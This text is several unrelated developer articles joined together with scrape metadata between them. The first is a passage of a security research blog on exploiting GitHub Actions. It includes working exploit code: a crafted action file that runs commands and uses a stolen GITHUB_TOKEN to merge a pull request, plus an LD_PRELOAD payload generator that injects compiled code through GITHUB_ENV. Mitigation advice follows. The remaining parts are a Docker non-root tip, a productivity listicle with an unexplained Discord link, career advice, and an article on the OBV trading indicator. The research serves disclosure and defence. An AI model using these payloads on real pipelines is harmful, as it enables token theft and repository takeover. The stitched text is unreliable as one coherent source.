Once a vulnerable workflow is discovered, the next question is, can it be exploited with a meaningful impact? Here are a couple of techniques we’ve found useful:
**Code or command injection in a step**: In the case, an attacker has control over the contents of a pull request, e.g., when a workflow triggers on `pull_request_target`, they can achieve arbitrary code execution in a handful of ways, including:
* Taking over a package manager install command — the most common example that comes to mind is adding a `preinstall` or `postinstall` script in a `package.json` file that will be executed in an `npm install` command. Of course, this is not limited to Node.js, as package managers have similar features in other ecosystems as well. For more examples, check out the [Living-Off-The-Pipeline](https://boostsecurityio.github.io/lotp/) page.
* Taking over an action hosted on the same repo — Actions can be hosted on any Github repo, including the one that contains the workflow. When the step’s `uses` clause starts with `./`, the code is contained in a subfolder within the repo. Replacing the `action.yml` file or one of the source files that will run, e.g., the `index.js` file in JavaScript, will run the code injected by the attacker.
**Using env var injection to set LD\_PRELOAD**: Github already considers environment variable injection a threat, hence limiting the ones a user can set. For instance, additional cli args can be provided to the `node` binary through the `NODE_OPTIONS` env var. If not restricted, an attacker could inject payload into that env var, which would lead to command execution. As a result, Github prevents `NODE_OPTIONS` from being set in a workflow, as detailed [here](https://github.blog/changelog/2023-10-05-github-actions-node_options-is-now-restricted-from-github_env/). One env var that is not restricted is `LD_PRELOAD`. `LD_PRELOAD` points to a shared object loaded by the Linux dynamic linker into the process memory before all others do. This allows function hooking, e.g., overwriting function calls with custom code mainly used for instrumentation. By overwriting a syscall like `open()` or `write()` used in filesystem operations, an attacker can inject code that’ll get executed from the point of injection and on.
To illustrate some of these techniques, let's look at a real-world example.
### terraform-cdk-action Pwn request
The `terraform-cdk-action` repo contains an action created by Terraform. Compromising the Github Actions workflow of this kind of repo is particularly dangerous as modifications to the action can further compromise workflows depending on it.
The vulnerability exists in the `integration-tests.yml` workflow:
```
pull_request_target: << This triggers the workflow
types:
- opened
- ready_for_review
- reopened
- synchronize
...
integrations-tests:
needs: prepare-integration-tests
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11
with:
ref: ${{ github.event.pull_request.head.ref }} << Unsafe checkout from fork
repository: ${{ github.event.pull_request.head.repo.full_name }}
...
- name: Install Dependencies
run: cd test-stacks && yarn install << This installs the attackers ‘package.json’
- name: Integration Test - Local
uses: ./ << This runs the local action, from within the PR
with:
workingDirectory: ./test-stacks
stackName: "test-stack"
mode: plan-only
githubToken: ${{ secrets.GITHUB_TOKEN }} << This token can be stolen
commentOnPr: false
- name: Integration Test - TFC
uses: ./ << This runs the local action, from within the PR
with:
workingDirectory: ./test-stacks
stackName: "test-stack"
mode: plan-only
terraformCloudToken: ${{ secrets.TF_API_TOKEN }} << This token can be stolen
githubToken: ${{ secrets.GITHUB_TOKEN }} << This token can be stolen
commentOnPr: false
```
This workflow is used to test the action within its own repo. Looking into the action.yml file, we can see that the `index.ts` (compiled to JavaScript) is the main file that gets executed:
```
name: terraform-cdk-action
description: The Terraform CDK GitHub Action allows you to run CDKTF as part of your CI/CD workflow.
runs:
using: node20
main: dist/index.js
```
The workflow references it in the `uses: ./` clause. Hence, all we need to do is modify it, and it’ll be executed. Here’s a look at the crafted `index.ts`:
```
import * as core from "@actions/core";
import { run } from "./action";
import { execSync } from 'child_process';
console.log("\r\nPwned action...");
console.log(execSync('id').toString());
const tfToken = Buffer.from(process.env.INPUT_TERRAFORMCLOUDTOKEN || ''.split("").reverse().join("-")).toString('base64');
const ghToken = Buffer.from(process.env.INPUT_GITHUBTOKEN || ''.split("").reverse().join("-")).toString('base64');
console.log('Testing token...');
const str = `# Merge PR
curl -X PUT \
https://api.github.com/repos/mousefluff/terraform-cdk-action/pulls/2/merge \
-H "Accept: application/vnd.github.v3+json" \
--header "authorization: Bearer ${process.env.INPUT_GITHUBTOKEN}" \
--header 'content-type: application/json' \
-d '{"commit_title":"pwned"}'`;
execSync(str, { stdio: 'inherit' });
run().catch((error) => {
core.setFailed(error.message);
});
```
We tested this on a copy of the original repo, so we won’t tamper with it. Since the `pull_request_target` trigger has write permissions to the base repo by default and it wasn’t restricted in any way or fashion, we were able to merge a PR with the compromised token successfully:

And we can see that the PR was successfully merged by the `github-actions[bot]`:

How to secure your pipelines
----------------------------
Securing Github Actions workflows depends on the implementation, and that can vary significantly. Different trigger scenarios require different safeguards. Let’s explore the various issues we’ve detailed and offer potential ways to mitigate them with some concrete examples for reference.
Avoid running privileged workflows on untrusted code — when using the `pull_request_target` or `workflow_run` triggers, do not checkout code from forked repos unless you have to. Meaning `- ref` shouldn’t point to the likes of `github.event.pull_request.head.ref` or `github.event.workflow_run.head_sha`. Since these triggers run in the context of the base repo with read/write permissions granted to the `GITHUB_TOKEN` by default and access to secrets, compromising these workflows is especially dangerous.
If checking out the code is a must, here are some additional safety measures:
**Validate the triggering repo/user**: Add an if condition to the checkout step to limit the triggering party:
```
jobs:
validate_email:
permissions:
pull-requests: write
runs-on: ubuntu-latest
if: github.repository == 'llvm/llvm-project'
steps:
- name: Fetch LLVM sources
uses: actions/checkout@v4
with:
ref: ${{ github.event.pull_request.head.sha }}
```
Taken from [llvm/llvm-project](https://github.com/llvm/llvm-project/blob/8827ff92b96d78ef455157574061d745df2909af/.github/workflows/email-check.yaml#L16). Notice the `if` condition that checks if the triggering Github repo is the base repo, thus blocking PRs triggered by forks.
Here’s another example, this time by checking that the user that created the PR is a trusted one:
```
jobs:
merge-dependabot-pr:
runs-on: ubuntu-latest
if: github.actor == 'dependabot[bot]'
steps:
- uses: actions/checkout@v4
with:
show-progress: false
ref: ${{ github.event.pull_request.head.sha }}
```
In [spring-projects/spring-security](https://github.com/spring-projects/spring-security/blob/89175dfed068bd22ce69f47e19fbcb7daefc6268/.github/workflows/merge-dependabot-pr.yml#L12-L12), `github.actor` is checked for Dependabot, thus blocking PRs originating from other users from running the job.
**Run the workflow only after manual validation**: This can be done by adding a label to the PR.
```
name: Benchmark
on:
pull_request_target:
types: [labeled]
jobs:
benchmark:
if: ${{ github.event.label.name == 'benchmark' }}
runs-on: ubuntu-latest
...
steps:
- uses: actions/checkout@v4
with:
persist-credentials: false
ref: ${{github.event.pull_request.head.sha}}
repository: ${{github.event.pull_request.head.repo.full_name}}
```
This example taken from [fastify/fastify](https://github.com/fastify/fastify/blob/af2ccb5ff681c1d0ac22eb7314c6fa803f73c873/.github/workflows/benchmark.yml#L9) shows a workflow triggered by a PR only when it’s labeled with “benchmark.” These if-condition statements can be applied both on the job and on a specific step level.
**Check that the triggering repo matches the base repo:** This is another way to restrict PRs originating from forked repos. For a workflow that triggers on `pull_request_target`, let’s look at the following `if` condition:
```
jobs:
deploy:
name: Build & Deploy
runs-on: ubuntu-latest
if: >
(github.event_name == 'pull_request_target' && contains(github.event.pull_request.labels.*.name, 'impact/docs'))
|| (github.event_name != 'pull_request' && github.event.pull_request.head.repo.full_name == github.repository)
```
As can be seen in [python-poetry/poetry](https://github.com/python-poetry/poetry/blob/108d7323280889b277751807fb7d564674fe6896/.github/workflows/docs.yaml#L23), notice the check that `github.event.pull_request.head.repo.full_name` coming from the PR event context matches the base repo `github.repository`.
Similarly, for a workflow that triggers on `workflow_run`, this will look like:
```
jobs:
publish-latest:
runs-on: ubuntu-latest
if: ${{ (github.event.workflow_run.conclusion == 'success') && (github.event.workflow_run.head_repository.full_name == github.repository) }}
```
As demonstrated in [TwiN/gatus](https://github.com/TwiN/gatus/blob/master/.github/workflows/publish-latest.yml#L13).
Treat actions the same as you would 3rd-party dependencies. Anyone familiar with the open source world and developer security hopefully knows by now the dangers of using packages stored in public code registries. Actions are the Github Actions’ dependency counterpart. If you’re using one, make sure to vet the repo that stores it. Once done, you can pin the action to a commit hash (a version tag is not good enough) to make sure that Github Actions will not pull a new version of it once it’s updated. This ensures that if the action gets compromised, you won’t suffer the consequences. An action can be pinned by using the `@` sign after the action’s name:
```
steps:
- uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2
```
**Handling untrusted artifacts in Github Actions**: Artifacts generated by workflows running on untrusted code should be treated with the same caution as user-controlled code, as they can potentially serve as an entry point for attackers into a privileged workflow. To mitigate this risk, when downloading artifacts using the `github/download-artifact` action, always specify a `path` parameter. This ensures the contents are extracted to a designated directory, preventing any accidental overwriting of files in the job’s root directory that could later be executed in a privileged context. Additionally, developers should ensure that the contents of these artifacts are properly escaped and sanitized before being used in any sensitive operations. By taking these precautions, you can significantly reduce the risk of introducing vulnerabilities through untrusted artifacts.
**Restrict the code that runs on self-hosted runners**: By default, PRs coming from forked repos need approval to execute workflows if the owner is a first-time contributor to the repo. If they’ve already contributed code, in as little as fixing a typo, the workflows will run automatically on their PRs. Obviously, this is an easy hurdle to pass, so the first recommendation is to set that setting to require approval for all external contributors:

There’s also a hardening tool by [step-security/harden-runner](https://github.com/step-security/harden-runner) designed to be the first step in any job in a workflow. A word of caution - hardening RCE-as-a-service solutions is not an easy task to accomplish so using this might not be without risk.
**Adhering to the least privilege principle**: In the worst case, a workflow gets compromised, an attacker can run arbitrary code. Restricting the permissions of the `GITHUB_TOKEN` can be the last line of defense preventing an attacker from fully taking over a repo. This can be done globally in the repo’s settings, for each workflow, or even for jobs in the YAML config file. Special attention should be given to workflows that trigger on events like `pull_request_target` and `workflow_run` that have full read/write access to the base repo by default.
Community tool: Github Actions scanner
--------------------------------------
In order to scan issues in your Github Actions workflows and actions, we created a CLI tool — [Github Actions Scanner](https://github.com/snyk/github-actions-scanner). Given a Github repo or an org, it’ll parse all the YAML config files and use a regex-based rule engine to flag findings. It also has features that can facilitate exploitation:
**Auto creation of a copy of the target repo**: If an issue is found and requires some additional validation or developing an exploit, we don’t want to do this on the target repo to avoid affecting the actual code and the risk of exposing the issue before it was responsibly disclosed and fixed. As a result, we can create a fresh copy of the repo on a Github user or org of choice to perform isolated testing.
`**LD\_PRELOAD**` **payload generation**: When command injection is possible, using `LD_PRELOAD` to compromise subsequent steps is usually a great way to take over a workflow. Thus, we have created a proof-of-concept (POC) generator based on the following template:
```
const ldcode = Buffer.from(`#include
void \_\_attribute\_\_((constructor)) so\_main() { unsetenv("LD\_PRELOAD"); system("${command.replace("\"", "\\\"")}"); }
`)
const code = Buffer.from(`echo ${ldcode.toString("base64")} | base64 -d | cc -fPIC -shared -xc - -o $GITHUB\_WORKSPACE/ldpreload-poc.so; echo "LD\_PRELOAD=$GITHUB\_WORKSPACE/ldpreload-poc.so" >> $GITHUB\_ENV`)
```
It implements the following steps:
* Create a small Base64 encoded C program that invokes the `system` syscall on a command specified by the user.
* Decode and compile it to a shared object in the `$GITHUB_WORKSPACE` root dir.
* Set `LD_PRELOAD` to the shared object and load it into the `GITHUB_ENV`.
Conclusion
----------
In this research, we provided an overview of Github Actions-related vulnerabilities and security hazards. Due to the multitude of options and the need for clarity in the official documentation, developers are still getting these wrong, resulting in compromised CI/CD pipelines. Make no mistake, misconfigured and outright vulnerable workflows are not unique to Github Actions, and special care must be taken to secure them. As modern supply chain scanners and static analyzers still can fail to detect these, developers must adhere to safe best practices. We created an open source tool to help fill in the gaps and flag potential issues. As more research is done in this area, this blog and others can help drive the developers’ focus and educate them so that the occurrence of these bugs diminishes.
| snyk_sec |
1,879,775 | Use non-root user in scratch docker image | It's considered best practice to use non-root user in docker images, even if it's built from scratch... | 0 | 2024-06-07T02:00:05 | https://dev.to/hsatac/use-non-root-user-in-scratch-docker-image-1c0o | docker, security | ---
title: Use non-root user in scratch docker image
published: true
description:
tags: docker, security
# cover_image: https://direct_url_to_image.jpg
# Use a ratio of 100:42 for best results.
# published_at: 2024-06-07 01:54 +0000
---
It's considered best practice to use non-root user in docker images, even if it's built from scratch image.
But in scratch image it's really empty, you can't use commands like useradd to create a non-root user.
We can use [multi stage builders](https://medium.com/@lizrice/non-privileged-containers-based-on-the-scratch-image-a80105d6d341) to achieve this.
```
FROM ubuntu:latest
RUN useradd -u 10001 scratchuser
FROM scratch
COPY dosomething /dosomething
COPY --from=0 /etc/passwd /etc/passwd
USER scratchuser
ENTRYPOINT ["/dosomething"]
```
How can we verify it? In order to verify, we need `id` command to check if the user is set correctly. We can copy the commands from `busybox`.
```
FROM busybox:1.35.0-uclibc as busybox
COPY --from=busybox /bin/sh /bin/sh
COPY --from=busybox /bin/id /bin/id
```
And now we can use `docker exec` to run the `id` command to verify if it works. | hsatac |
1,879,773 | 9 Habits of Highly Effective Programmers | As A Programmer the biggest improvement in my life came when I realized happiness is just a product... | 0 | 2024-06-07T01:49:01 | https://dev.to/healthydeveloper1/9-habits-of-highly-effective-programmers-5a27 | productivity, mentalhealth, developers, programmers | **As A Programmer the biggest improvement in my life came when I realized happiness is just a product of good habits.**
## Say No by Default
**say no to :**
- excessive overtime
- impossible deadlines
- unsolvable requirements
- unclear requirements
- unreasonable requirements
> "Your Mental Health Comes First"
## Get Addicted to Learning

Put time aside daily before bed to read.
At first, it was tough to stay consistent - but the more you did it, the more its effects compounded.
If you get in the habit of learning from programming books, your learning rate becomes faster by default.
## Prioritize Nature

A study of 20,000 people in the UK found that 120 minutes/week in nature improved health and well-being.
It's the planet's greatest healer.
> The Ultimate Solution for Fixing Bugs : the nature
## Morning Routine
• No Computer first thing
• A small win early (e.g. light exercise)
• Mind primed for deep work (e.g. by journalling)
Your morning is the stretching before the sprint.
## Embrace Loneliness
Twice a month, I do something normally "social" alone.
I'll eat dinner, go to the park, or attend a movie by myself.
Solitude is an essential pillar to truly knowing yourself: it's the secret garden where self-discovery can bloom.
## Choose Writing Over Complaining

Complaining isn't attractive - it repels ambitious people and fosters a negative mindset.
Write down your thoughts instead: you're forced to think slowly and deeply so your irrationality loses its edge.
> Analyze them like you do with code .
## Pay it Forward
Random acts of kindness boost well-being:
• Holding the door for someone
• Picking up trash outside
• Giving a compliment
> The world's a closed system: if you send waves of positivity out, they'll find their way back to you.
## Maintain Relationships
Programmers Don't Have to be Socially Awkward.
So schedule time weekly for thoughtful texts and calls to those you've neglected.
It's a couple of minutes with an ROI you'll measure in years.
> "Don't Be like Eliot "

## Focus on Your Health
I’m convinced most mental health problems are actually physical health problems. Everyone I know who:
• Eats well
• Exercises daily
• Drinks enough water
> Take care of yourself , You're not an AI
**Tech workers today are suffering from issues that no one talks about:**
• Burnout
• Anxiety
• Toxic workplaces
• isolation
Geeks, [pick yourself up]( http://discordtree.com/view-4218).
| healthydeveloper1 |
1,879,772 | Questions to assess culture (fit) in tech | A list of questions to learn about team culture (fit) in tech | 0 | 2024-06-07T01:40:34 | https://dev.to/rvprasad/questions-to-identifyassess-culture-fit-in-tech-1d98 | work, culture, technology | ---
title: Questions to assess culture (fit) in tech
published: true
description: A list of questions to learn about team culture (fit) in tech
tags: Work, Culture, Technology
# cover_image: https://direct_url_to_image.jpg
# Use a ratio of 100:42 for best results.
# published_at: 2024-06-07 01:37 +0000
---
Based on my observations of teams, I compiled the following non-exhaustive list of questions to learn about the culture of a work environment.
1. Do teams have a list of well-defined values and behaviors that allow them to decide and execute mostly independently?
2. How does the work/development environment support prototyping and experimentation?
3. How long (or how much effort) does it take to go from idea to deploying a prototype or an alpha version to internal consumers, say, for continuous experimentation and development)?
4. Do teams conduct retrospectives? If so, for what scenarios and what happens after retrospectives? If not, why not?
5. How do teams ensure accountability for execution and outcomes? What about accountability for decisions? What about accountability for technical debt?
6. Would you deem your culture a permission culture or a constraint culture?
7. What is the basis of decisions in your teams, e.g., opinions, evidence, tenure of the executor, track record of the executor, or benefits from the effort?
8. What is the decision-making credo in your teams, e.g., skin in the game, no one is hurt, put up or shut up, where the buck stops?
9. What happens when team X needs feature Q in product P, which team Y owns but cannot build feature Q?
10. What is the reward/recognition culture, e.g., promo for having a significant impact or promo for executing long-term projects?
11. Were any projects shelved in the last 6–12months? Why were the projects shelved? Who initiated the shelving?
12. Who identifies and initiates projects? What is the associated process?
13. During work hours, how much time do developers spend learning new knowledge that may not be immediately relevant to their current work?
There are no generally right or wrong answers to (all of) these questions. There are different degrees of goodness-of-fit between the provided answers and the expected answers expected to these questions.
Answering these questions can help employers and prospective employees assess whether they are a good fit.
To use these questions, prospective employees should identify the answers to these questions that align with their expectations of a reasonable work environment. Then, they can seek answers to these questions in interviews (remember the “do you have any questions for us?” question :)) or when researching about employers.
Likewise, employers can adapt and adopt these questions in behavioral interviews to assess cultural fit. Before using them, employers should identify the answers that represent their work environment.
Teams and organizations can benefit from regularly revisiting such questions to assess the culture of their work environment.
Of course, the above questions will be useless without honest answers :)
Original post is available [here](https://medium.com/@rvprasad/questions-to-assess-culture-fit-in-tech-a7cfb2e94382).
| rvprasad |
1,879,771 | Transform Your Video Transcripts: From Raw to Readable Text | I cannot help but think of all the YouTube videos I have had to watch, simply because I didn't know... | 0 | 2024-06-07T01:34:35 | https://dev.to/roomals/transform-your-video-transcripts-from-raw-to-readable-text-15ep | python, ai, machinelearning, codenewbie | I cannot help but think of all the YouTube videos I have had to watch, simply because I didn't know how to save their transcripts. When I finally learned how, the resulting text was a mess. For instance, here’s a snippet from a required video for my biological psychology course:
```plaintext
Input: I've come here to California on the trail of one of the most infamous doctors of the with century Or Alter Freemen the last Alter Freemen began practicing as a doctor in the 1920s going on to work in one of the last institutions set up to house growing numbers of mentally ill people the Shell Shocked victims of the first world war and inmates with Dreadful psychiatric problems lived out their lives in what were known as snake pits psychiatric hospitals in the 1930s were terrible places to be as a patient and they were terrible places because they were they were places of hopelessness there were really no effective treatments for most mental disorders for the most part these hospitals warehouse patients for long periods of times decades even entire lives Freemen was horrified at the sheer waste of human potential now he started out with with good intentions and here was a terribly serious problem and it wasn't getting any better it was getting worse it was a public health problem Freemen was convinced that the root cause of many of the patients problems lay in the physical structure of their brains so he decided to change them a pulled by what he was seeing in these snake pits Freemen now spent increasing amounts of time in the laboratory coat brains dissecting brains examining brains looking for differences this is the brain received through the courtesy of Washington sanitary Freemen thought that surgery could help patients far more than the current treatments are cut off at the level of the middle of the pond spurred on by the growing understanding of what different regions of the brain do he finally decided that the problem lay in a set of connections between the thalamus and the frontal love the pointer demonstrates the thalamus and the anterior thalamic radiation going to all parts of the frontal L Freemen believed if he could never the connections between the thalamus and the frontal love and this would damper down all those awful emotions and it would if you like cure the patients he saw this as surgery of the Soul a way of bringing the Damned back to life but there was a problem Freemen was not himself a surgeon so he got together with a man who was James wants and together they started performing the operation action they called labotomy
[ Music ]
```
Not bad...
However, the lack of punctuation makes the experience less-than-desirable. So, to remedy this situation, I weaved together the original script that relied on the YouTubeTranscriptApi, TextBlob, and by importing the functionalities of the punctuators module.
```python
from punctuators.models import PunctCapSegModelONNX
from textblob import TextBlob
from tqdm import tqdm
from typing import List
from youtube_transcript_api import YouTubeTranscriptApi
import nltk
import spacy
# Initialize models and download necessary resources
m = PunctCapSegModelONNX.from_pretrained("1-800-BAD-CODE/xlm-roberta_punctuation_fullstop_truecase")
nltk.download('punkt')
nlp = spacy.load("en_core_web_sm")
def nest_sentences(document: str, max_length: int = 1024) -> List[str]:
"""
Nest sentences into groups ensuring each group does not exceed max_length.
"""
nested, sent, length = [], [], 0
for sentence in nltk.sent_tokenize(document):
length += len(sentence)
if length < max_length:
sent.append(sentence)
else:
nested.append(" ".join(sent))
sent = [sentence]
length = len(sentence)
if sent:
nested.append(" ".join(sent))
return nested
def process_transcript(video_id: str) -> str:
"""
Retrieve and concatenate transcripts from YouTube video.
"""
transcript_list = YouTubeTranscriptApi.list_transcripts(video_id)
all_transcript_text = []
for transcript in transcript_list:
transcript_data = transcript.fetch()
transcript_text = " ".join(entry["text"] for entry in transcript_data)
all_transcript_text.append(transcript_text)
return " ".join(all_transcript_text)
def filter_tokens(text: str) -> str:
"""
Remove spaces from tokens in the text using spaCy.
"""
doc = nlp(text)
return " ".join(token.text for token in doc if not token.is_space)
def correct_text(text: str) -> str:
"""
Correct the text using TextBlob.
"""
blob = TextBlob(text)
return str(blob.correct())
def punctuate_text(texts: List[str]) -> List[str]:
"""
Punctuate and segment the texts using the pre-trained model.
"""
return m.infer(texts=texts, apply_sbd=True)
def main(video_id: str):
"""
Main processing function.
"""
transcript_text = process_transcript(video_id)
filtered_text = filter_tokens(transcript_text)
corrected_text_str = correct_text(filtered_text)
nested_sentences = nest_sentences(corrected_text_str)
results = punctuate_text(nested_sentences)
for input_text, output_texts in tqdm(zip(nested_sentences, results), desc="Processing", total=len(nested_sentences)):
print(f"Input: {input_text}")
print("Outputs:")
for text in output_texts:
print(f"\t{text}")
print()
if __name__ == "__main__":
video_id = "CUgtGjA6VvA"
main(video_id)
```
### Script Summary and Utility
This script is designed to process transcripts from YouTube videos and enhance their readability by applying punctuation, correcting errors, and ensuring proper segmentation. Here's a breakdown of its components and why it's useful:
#### Key Components:
1. **Import Libraries:**
- `PunctCapSegModelONNX` from `punctuators.models`: Adds punctuation and capitalization to the text.
- `TextBlob`: Corrects grammatical and spelling errors in the text.
- `YouTubeTranscriptApi`: Fetches transcripts from YouTube videos.
- `nltk` and `spacy`: Tokenizes and processes text to ensure proper segmentation.
2. **Initialization:**
- Load the pre-trained punctuation and capitalization model.
- Download necessary NLTK resources and load spaCy's English language model.
3. **Functions:**
- `nest_sentences(document: str, max_length: int = 1024) -> List[str]`: Groups sentences into segments not exceeding a specified length to maintain context and readability.
- `process_transcript(video_id: str) -> str`: Retrieves and concatenates transcripts from a given YouTube video ID.
- `filter_tokens(text: str) -> str`: Removes spaces and ensures proper tokenization using spaCy.
- `correct_text(text: str) -> str`: Uses TextBlob to correct grammatical and spelling errors in the text.
- `punctuate_text(texts: List[str]) -> List[str]`: Applies punctuation and segmentation to the text using the pre-trained model.
4. **Main Function (`main(video_id: str)`):**
- Retrieves the YouTube video transcript.
- Processes the transcript by filtering tokens, correcting text, nesting sentences, and applying punctuation.
- Prints the input and processed text for each nested segment.
#### Why This Script is Useful:
1. **Improves Readability:**
- Adds punctuation and capitalization, transforming raw transcripts into more readable text.
2. **Corrects Errors:**
- Uses TextBlob to automatically correct grammatical and spelling errors, enhancing the accuracy of the text.
3. **Ensures Proper Segmentation:**
- Splits text into manageable segments to maintain context and readability, especially useful for long transcripts.
4. **Automates Transcript Processing:**
- Simplifies the process of retrieving and enhancing YouTube video transcripts, saving time and effort for users.
5. **Educational Tool:**
- Can be included in a student package toolset to aid in processing and analyzing video transcripts for study purposes, making lecture notes or online video content more accessible and easier to study from.
Below is the output of the original CC from the video after it was processed:
```plaintext
Outputs:
I've come here to California on the trail of one of the most infamous doctors of the with century.
Or Alter Freemen, the last Alter Freemen began practicing as a doctor in the 1920s, going on to work in one of the last institutions set up to house growing numbers of mentally ill people.
The Shell Shocked victims of the First World War and inmates with Dreadful psychiatric problems lived out their lives in what were known as snake pits.
Psychiatric hospitals in the 1930s were terrible places to be as a patient, and they were terrible places because they were, they were places of hopelessness.
There were really no effective treatments for most mental disorders.
For the most part, these hospitals warehouse patients for long periods of times, decades, even entire lives.
Freemen was horrified at the sheer waste of human potential.
Now he started out with with good intentions.
And here was a terribly serious problem, and it wasn't getting any better, it was getting worse.
It was a public health problem.
Freemen was convinced that the root cause of many of the patients problems lay in the physical structure of their brains, so he decided to change them, a pulled by what he was seeing in these snake pits.
Freemen now spent increasing amounts of time in the laboratory, coat brains, dissecting brains, examining brains, looking for differences.
This is the brain received through the courtesy of Washington Sanitary.
Freemen thought that surgery could help patients far more than the current treatments are cut off at the level of the middle of the pond.
Spurred on by the growing understanding of what different regions of the brain do, he finally decided that the problem lay in a set of connections.
Between the thalamus and the frontal love The pointer demonstrates the thalamus and the anterior thalamic radiation going to all parts of the frontal.
Freemen believed if he could, never the connections between the thalamus and the frontal love.
And this would damper down all those awful emotions, and it would, if you like, cure the patients.
He saw this as Surgery of the Soul, a way of bringing the Damned back to life.
But there was a problem.
Freemen was not himself a surgeon, so he got together with a man who was James Wants, and together, they started performing the operation action they called lobotomy
[ Music ].
```
Overall, the quality is significantly better! All things considered, this script is a valuable tool for anyone looking to enhance the quality and readability of YouTube video transcripts, making it especially useful for students, researchers, and content creators. The script can also be modified with a transformer and used for translation processes, too!
Till next time,
Roomal | roomals |
1,879,768 | Advice for Effective Developers | Syntax FM released a podcast episode 11 habits of highly effective developers yesterday, it's filled... | 0 | 2024-06-07T01:24:52 | https://jonathanyeong.com/advice-for-effective-developers/ | beginners, career, learning | Syntax FM released a podcast episode [11 habits of highly effective developers](https://syntax.fm/show/778/11-habits-of-highly-effective-developers/transcript) yesterday, it's filled with anecdotes, and great advice. If you haven't already, give it a listen! Scott Tolinksi and Wes Bos shared these 11 habits:
- Understand stakeholders and business goals
- Have an open mind about new tech
- Help others with problems
- Understand work-life balance
- Pay attention to details
- Be curious and always learning
- Ask for help when needed
- Have fun with development
- Be empathetic to users and coworkers
- Be part of the developer community
While listening, I made a mental note to keep practising these habits, I loved them! Especially, having fun with development. Usually, I see programming as a way to solve business problems. I forget that it can also be used to make fun things!
After the podcast ended, I thought about what advice would I have given my past self to be a more effective developer? So I made a list! I'll add to it over time, and I hope you'll find the advice useful.
---
Naming is hard. Understanding the domain of your application can help. If possible, err on being specific with your name rather than generic.
Build your pattern matching muscle. Not regex (although that can be useful), but patterns with solving problems. Watch how others solve problems, debug, and write code. Go through the same process yourself over and over again.
Pair frequently and with different people. The benefits of pairing greatly outweigh working solo on complex issues.
"For each desired change, make the change easy (warning: this may be hard), then make the easy change" - [Kent Beck](https://x.com/KentBeck/status/250733358307500032)
Find the most straightforward path to solve a problem. If this path doesn't exist, can you make it happen? Only when you've exhausted your options should you look at more complicated solutions. *I find this advice the hardest to follow.*
Introspect often and stay away from autopilot mode. After finishing a tutorial, take the time to understand what you've learnt and how you could use that knowledge in other ways.
Pursue what is interesting to you. Drown out the hubbub, the trends, the absolutists. If you don't know what fascinates you yet; experiment.
Go broad on a topic before going deep. This advice ties in with the one above. Experiment until you find something, then go deep on it. Going broad diversifies your mental models. Going deep strengthens your models.
Have a career document aka brag document. Use it to show your impact at your role. Save all the good stuff people say about you or things that you're proud of. Look at it whenever you're feeling down or feeling like an imposter.
Practice saying no. Overcommitting is stressful. Burnout is real, take the time to care for yourself.
You don't need to write blog posts, produce content, or commit to open source to be a successful developer. But it can be a nice way to give back to the community. | jonoyeong |
1,879,767 | Detailed usage and practical skills of energy tide(OBV) indicator in quantitative trading | What is the energy tide? There is an idiom like this in ancient times: "always prepare... | 0 | 2024-06-07T01:20:45 | https://dev.to/fmzquant/detailed-usage-and-practical-skills-of-energy-tideobv-indicator-in-quantitative-trading-55ao | trading, fmzquant, cryptocurrency, obv | ## What is the energy tide?
There is an idiom like this in ancient times: "always prepare supply before soldiers." There is also a similar statement in the trading business: "Trading volume always before the price." It means the rise and fall of prices are always driven by the volume of transactions, and every price movement will reflect in the trading volume first. As a result, some people invented the "On Balance Volume (OBV)" indicator to measure the volume.
The Energy Tide (OBV) was invented by Joe Granville in the 1960s. Although the algorithm is simple, in the "price, quantity, time, and space" of the trading, take the "quantity" For the entry point, it has been favored by many traders. As a popular indicator in the trading market, the energy tide can intuitively reflect the relationship between price and volume, thus helping traders to observe the market from more angles.
## The energy tide in the chart

As shown in the above figure, although the energy tide describes the volume, its trend is obviously different from the volume. Readers may find that the trend of the energy tide is basically consistent with the price trend, and there are relatively high and relatively low points. Only the trend is smoother. It quantifies the volume and plots it like a trend line.
## The theoretical basis of the energy tide
For the trading, when the price is consistent with the idea of most traders, the volume will become smaller, because the buyer has already bought it, and the seller has already sold it. Conversely, when the price is inconsistent with the idea of most traders, the volume will increase, because the buyer believes that the price will continue to rise, the seller will think that the price will fall, and when they are all put into action, the volume will Become bigger. Therefore, the energy tide reacts not only to market sentiment, but also to the power between long and short.
In addition, according to the principle of reflexivity: “Ideas change the facts, and the change of facts in turn changes the idea”, that is to say, when people think that the price will continue to rise, they will buy it by action, and the result will be the transaction. The volume increased and the price continued to rise. When people see the price continue to rise, they will think that the price may continue to rise and further push upward the price. This is why we see the price rise in the market when the price rises, and there is a lot of volume.
## Calculation method of energy tide
The calculation method of the energy tide is actually not complicated. If the current K-line closing price is greater than the pervious K-line closing price, then the current K-line energy tide is the current K-line trading volume plus the pervious K-line energy tide. If the current K-line closing price is less than the pervious K-line closing price, then the energy tide of the current K-line is the pervious K-line energy tide minus the current volume.
- If the current K-line closing price is greater than the pervious K-line closing price, then:
OBV(i) = OBV(i - 1) + VOLUME(i)
- If the current K-line closing price is less than the pervious K-line closing price, then:
OBV(i) = OBV(i - 1) - VOLUME(i)
- If the current K-line closing price is equal to the pervious K-line closing price, then:
OBV(i) = OBV(i - 1)
Among them:
- OBV(i): current energy tide of the K line
- OBV(i - 1): the energy tide of the pervious K line
- VOLUME(i): current K line volume
## The actual principle of energy tide
One of the most basic preconditions for using energy flows is to assume that the change in volume is alway appearing before the the change of price, that is, the “quantity before price” we mentioned above. Usually, the price increase or decrease must be matched by the volume, and the increase and decrease of the volume will affect the price change all the time. For example, the price increase or decrease is generally accompanied by a large volume of transactions, but if the price increase or decline volume does not change much, then this price movement is difficult to continue.
When the energy tide is upward, we can think that funds are flooding into the market, market transactions are unprecedentedly active, and future prices may rise. When the energy tide is downward, we can think that funds are being withdrawn from the market and market transactions are gradually deserted. Future prices may fall.
How can we judge whether the energy tide is rising or falling? In fact, you can use the method of judging the price direction to judge the energy tide. In the energy tide of rising and falling, the trend is not in one go. There are also three characteristics of stepping forward. In the trend, we can find that there are peaks and troughs. Then in the rising trend, each trough is higher than the previous trough. In the downward trend, each peak is lower than the previous peak.
Although, in the quantitative trading, it is not necessary to identify the peaks and troughs to generate signals. You can use the moving average or channel line to measure the trend of the energy tide, which is easy for novices to achieve. For example, the moving average is to average the energy tide of a period. If the current energy tide is greater than this average, the capital is more optimistic about the market. If the current energy tide is less than this average, the capital is less interested in the market.
## Energy tide trading logic
